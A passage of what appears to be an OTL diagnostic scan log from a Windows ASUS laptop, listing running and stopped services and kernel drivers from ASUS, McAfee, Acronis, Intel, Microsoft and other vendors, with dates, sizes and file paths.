SRV - [2013/01/15 17:20:54 | 000,107,320 | ---- | M] (ASUSTek Computer Inc.) [Auto | Running] -- C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe -- (ASLDRService)
SRV - [2012/12/19 08:10:38 | 000,072,192 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSWinService.exe -- (Asus WebStorage Windows Service)
SRV - [2011/11/21 15:19:50 | 000,096,896 | ---- | M] (ASUS) [Auto | Running] -- C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe -- (ATKGFNEXSrv)
SRV - [2011/08/18 02:29:52 | 001,039,360 | ---- | M] (Hewlett-Packard Co.) [Auto | Running] -- C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL -- (HPSLPSVC)


========== Driver Services (SafeList) ==========

DRV:64bit: - [2014/04/26 15:58:16 | 000,034,752 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WPRO_41_2001.sys -- (WPRO_41_2001)
DRV:64bit: - [2014/03/17 19:02:08 | 000,070,592 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\cfwids.sys -- (cfwids)
DRV:64bit: - [2014/03/17 18:54:54 | 000,345,456 | ---- | M] (McAfee, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mfewfpk.sys -- (mfewfpk)
DRV:64bit: - [2014/03/17 18:49:44 | 000,783,864 | ---- | M] (McAfee, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mfehidk.sys -- (mfehidk)
DRV:64bit: - [2014/03/17 18:47:30 | 000,522,360 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfefirek.sys -- (mfefirek)
DRV:64bit: - [2014/03/17 18:45:38 | 000,311,600 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfeavfk.sys -- (mfeavfk)
DRV:64bit: - [2014/03/17 18:44:40 | 000,180,272 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfeapfk.sys -- (mfeapfk)
DRV:64bit: - [2014/03/17 18:25:42 | 000,069,344 | ---- | M] (McAfee, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mfeelamk.sys -- (mfeelamk)
DRV:64bit: - [2014/03/10 12:35:53 | 000,377,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:64bit: - [2014/01/22 09:52:10 | 000,206,080 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssudmdm.sys -- (ssudmdm)
DRV:64bit: - [2014/01/22 09:52:10 | 000,108,800 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssudbus.sys -- (dg_ssudbus)
DRV:64bit: - [2014/01/21 04:50:24 | 000,096,592 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mfencrk.sys -- (mfencrk)
DRV:64bit: - [2014/01/21 04:50:02 | 000,422,712 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfencbdc.sys -- (mfencbdc)
DRV:64bit: - [2014/01/08 03:46:27 | 000,325,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:64bit: - [2013/12/29 23:08:39 | 000,099,288 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\TeeDriverx64.sys -- (MEIx64)
DRV:64bit: - [2013/12/27 20:42:26 | 000,039,200 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvvad64v.sys -- (nvvad_WaveExtensible)
DRV:64bit: - [2013/11/23 21:26:48 | 000,032,544 | ---- | M] (NVIDIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\nvpciflt.sys -- (nvpciflt)
DRV:64bit: - [2013/11/21 09:31:28 | 000,632,168 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:64bit: - [2013/11/12 13:08:22 | 000,367,200 | ---- | M] (Acronis) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\afcdp.sys -- (afcdp)
DRV:64bit: - [2013/11/12 13:08:20 | 001,464,096 | ---- | M] (Acronis International GmbH) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tdrpman.sys -- (tdrpman)
DRV:64bit: - [2013/11/12 13:08:18 | 000,198,432 | ---- | M] (Acronis International GmbH) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\tib_mounter.sys -- (tib_mounter)
DRV:64bit: - [2013/11/12 13:08:16 | 001,120,032 | ---- | M] (Acronis International GmbH) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\tib.sys -- (tib)
DRV:64bit: - [2013/11/12 13:08:10 | 000,269,600 | ---- | M] (Acronis International GmbH) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\snapman.sys -- (snapman)
DRV:64bit: - [2013/11/12 13:08:07 | 000,116,000 | ---- | M] (Acronis International GmbH) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\fltsrv.sys -- (fltsrv)
DRV:64bit: - [2013/11/11 04:48:41 | 000,039,768 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:64bit: - [2013/11/01 13:39:53 | 000,086,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:64bit: - [2013/10/31 02:58:59 | 000,372,568 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:64bit: - [2013/10/31 02:29:36 | 000,236,888 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:64bit: - [2013/10/31 02:29:36 | 000,124,760 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:64bit: - [2013/10/31 02:28:47 | 000,035,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:64bit: - [2013/10/26 03:54:32 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:64bit: - [2013/10/23 17:28:54 | 000,017,568 | ---- | M] (CybelSoft) [Kernel | On_Demand | Stopped] -- C:\Program Files\ma-config.com\Drivers\ma-config_amd64.sys -- (ma-config_amd64)
DRV:64bit: - [2013/10/14 04:24:22 | 003,607,520 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NETwbw02.sys -- (NETwNb64)
DRV:64bit: - [2013/10/13 04:48:34 | 000,136,536 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:64bit: - [2013/10/09 09:52:16 | 000,020,280 | ---- | M] (ASUS) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AsHIDSwitch64.sys -- (HIDSwitch)
DRV:64bit: - [2013/10/08 22:52:34 | 003,648,480 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NETwew02.sys -- (NETwNe64)
DRV:64bit: - [2013/10/05 17:25:54 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:64bit: - [2013/10/01 13:02:30 | 004,177,920 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2013/09/30 06:13:57 | 000,467,800 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:64bit: - [2013/09/30 06:13:57 | 000,236,376 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:64bit: - [2013/09/30 06:13:57 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:64bit: - [2013/09/30 05:59:54 | 000,027,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2013/09/30 05:59:49 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:64bit: - [2013/09/23 13:49:22 | 000,197,704 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HipShieldK.sys -- (HipShieldK)
DRV:64bit: - [2013/09/09 12:11:58 | 000,074,560 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\McPvDrv.sys -- (McPvDrv)
DRV:64bit: - [2013/08/23 00:51:12 | 000,039,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:64bit: - [2013/08/23 00:51:12 | 000,026,008 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:64bit: - [2013/08/22 15:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:64bit: - [2013/08/22 15:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2013/08/22 14:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:64bit: - [2013/08/22 14:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:64bit: - [2013/08/22 14:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:64bit: - [2013/08/22 14:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:64bit: - [2013/08/22 14:43:48 | 000,146,272 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:64bit: - [2013/08/22 14:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:64bit: - [2013/08/22 14:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2013/08/22 14:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2013/08/22 14:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:64bit: - [2013/08/22 14:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2013/08/22 14:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:64bit: - [2013/08/22 14:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:64bit: - [2013/08/22 14:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2013/08/22 14:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2013/08/22 14:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:64bit: - [2013/08/22 14:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2013/08/22 14:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:64bit: - [2013/08/22 14:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:64bit: - [2013/08/22 14:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2013/08/22 14:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:64bit: - [2013/08/22 14:43:33 | 000,189,792 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:64bit: - [2013/08/22 14:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:64bit: - [2013/08/22 14:43:32 | 000,078,688 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:64bit: - [2013/08/22 14:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2013/08/22 14:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:64bit: - [2013/08/22 14:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:64bit: - [2013/08/22 14:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:64bit: - [2013/08/22 14:41:08 | 000,054,304 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:64bit: - [2013/08/22 14:40:24 | 000,040,664 | ---- | M] (The OpenVPN Project) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\tap0901.sys -- (tap0901)
DRV:64bit: - [2013/08/22 14:39:15 | 000,924,512 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:64bit: - [2013/08/22 14:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:64bit: - [2013/08/22 14:37:27 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:64bit: - [2013/08/22 14:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:64bit: - [2013/08/22 13:39:54 | 000,076,800 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:64bit: - [2013/08/22 13:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:64bit: - [2013/08/22 13:39:28 | 000,033,792 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:64bit: - [2013/08/22 13:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:64bit: - [2013/08/22 13:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:64bit: - [2013/08/22 13:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:64bit: - [2013/08/22 13:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:64bit: - [2013/08/22 13:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:64bit: - [2013/08/22 13:38:30 | 000,131,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthA2DP.sys -- (BthA2DP)
DRV:64bit: - [2013/08/22 13:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:64bit: - [2013/08/22 13:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:64bit: - [2013/08/22 13:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:64bit: - [2013/08/22 13:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:64bit: - [2013/08/22 13:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:64bit: - [2013/08/22 13:37:46 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2013/08/22 13:37:42 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:64bit: - [2013/08/22 13:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2013/08/22 13:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:64bit: - [2013/08/22 13:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2013/08/22 13:36:43 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:64bit: - [2013/08/22 13:36:37 | 000,224,768 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthLEEnum.sys -- (BthLEEnum)
DRV:64bit: - [2013/08/22 13:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:64bit: - [2013/08/22 13:36:17 | 000,124,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatformMp)
DRV:64bit: - [2013/08/22 13:36:17 | 000,124,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:64bit: - [2013/08/22 13:36:07 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:64bit: - [2013/08/22 13:35:42 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:64bit: - [2013/08/22 12:27:46 | 000,011,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\serscan.sys -- (StillCam)
DRV:64bit: - [2013/08/22 10:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:64bit: - [2013/08/15 15:28:42 | 000,830,680 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt630x64.sys -- (RTL8168)
DRV:64bit: - [2013/08/13 01:25:46 | 000,017,624 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:64bit: - [2013/08/10 02:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:64bit: - [2013/07/30 20:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:64bit: - [2013/07/29 05:01:36 | 000,165,344 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\AmpPal.sys -- (AMPPALP)
DRV:64bit: - [2013/07/29 05:01:36 | 000,165,344 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AmpPal.sys -- (AMPPAL)
DRV:64bit: - [2013/07/25 21:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:64bit: - [2013/06/03 11:58:16 | 000,115,656 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ibtusb.sys -- (ibtusb)
DRV:64bit: - [2013/05/02 09:19:08 | 000,442,368 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2013/04/23 15:50:22 | 001,385,272 | ---- | M] (Motorola Solutions, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btmhsf.sys -- (btmhsf)
DRV:64bit: - [2013/04/22 04:13:30 | 000,200,808 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\DptfManager.sys -- (DptfManager)
DRV:64bit: - [2013/04/22 04:13:30 | 000,120,256 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\DptfDevProc.sys -- (DptfDevProc)
DRV:64bit: - [2013/04/22 04:13:30 | 000,068,072 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\DptfDevDram.sys -- (DptfDevDram)
DRV:64bit: - [2013/04/22 04:13:30 | 000,057,216 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\DptfDevPch.sys -- (DptfDevPch)
DRV:64bit: - [2013/04/16 19:08:50 | 000,207,768 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\usb3Hub.sys -- (usb3Hub)
DRV:64bit: - [2013/04/16 18:25:46 | 000,065,784 | ---- | M] (ASUS Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AsusTP.sys -- (ATP)
DRV:64bit: - [2013/04/15 16:38:30 | 000,046,568 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ISCTD64.sys -- (ISCT)
DRV:64bit: - [2013/04/15 16:38:30 | 000,021,048 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\imsevent.sys -- (imsevent)
DRV:64bit: - [2013/04/15 16:38:30 | 000,021,048 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ikbevent.sys -- (ikbevent)
DRV:64bit: - [2013/03/12 22:12:14 | 000,017,152 | ---- | M] (ASUSTek Computer Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AiCharger.sys -- (AiCharger)
DRV:64bit: - [2013/01/15 11:37:12 | 000,327,240 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\RtsUVStor.sys -- (RSUSBVSTOR)
DRV:64bit: - [2013/01/08 09:03:30 | 000,112,552 | ---- | M] (Condusiv Technologies) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\excsd.sys -- (excsd)
DRV:64bit: - [2013/01/08 09:03:30 | 000,026,024 | ---- | M] (Condusiv Technologies) [File_System | System | Running] -- C:\Windows\SysNative\drivers\excfs.sys -- (excfs)
DRV:64bit: - [2012/08/02 05:22:48 | 000,014,992 | ---- | M] ( ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kbfiltr.sys -- (kbfiltr)
DRV:64bit: - [2012/07/15 17:48:16 | 000,030,720 | ---- | M] (The OpenVPN Project) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tapoas.sys -- (tapoas)
DRV:64bit: - [2012/03/22 22:08:36 | 000,023,752 | ---- | M] (Cambridge Silicon Radio Limited) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\csrusbfilter.sys -- (csrusbfilter)
DRV:64bit: - [2012/03/22 22:08:34 | 000,047,296 | ---- | M] (Cambridge Silicon Radio Limited) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\csrusb.sys -- (csrusb)
DRV:64bit: - [2012/03/22 22:08:32 | 000,061,128 | ---- | M] (Cambridge Silicon Radio Limited) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\csrserial.sys -- (csrserial)
DRV:64bit: - [2012/03/22 22:08:30 | 000,039,616 | ---- | M] (Cambridge Silicon Radio Limited) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\csrpan.sys -- (csrpan)
DRV:64bit: - [2012/03/22 22:08:22 | 002,784,968 | ---- | M] (Cambridge Silicon Radio Limited) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\CsrBtPort.sys -- (CsrBtPort)
DRV:64bit: - [2012/03/22 22:08:20 | 000,099,520 | ---- | M] (Cambridge Silicon Radio Limited) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\csrbthav.sys -- (csr_bthav)
DRV - [2011/09/07 10:55:04 | 000,017,536 | ---- | M] (ASUS) [Kernel | System | Running] -- C:\Program Files (x86)\ASUS\ATK Package\ATK WMIACPI\atkwmiacpi64.sys -- (ATKWMIACPIIO)
DRV - [2009/07/02 18:36:14 | 000,015,416 | ---- | M] (ASUS) [Kernel | Auto | Running] -- C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\ASMMAP64.sys -- (ASMMAP64)


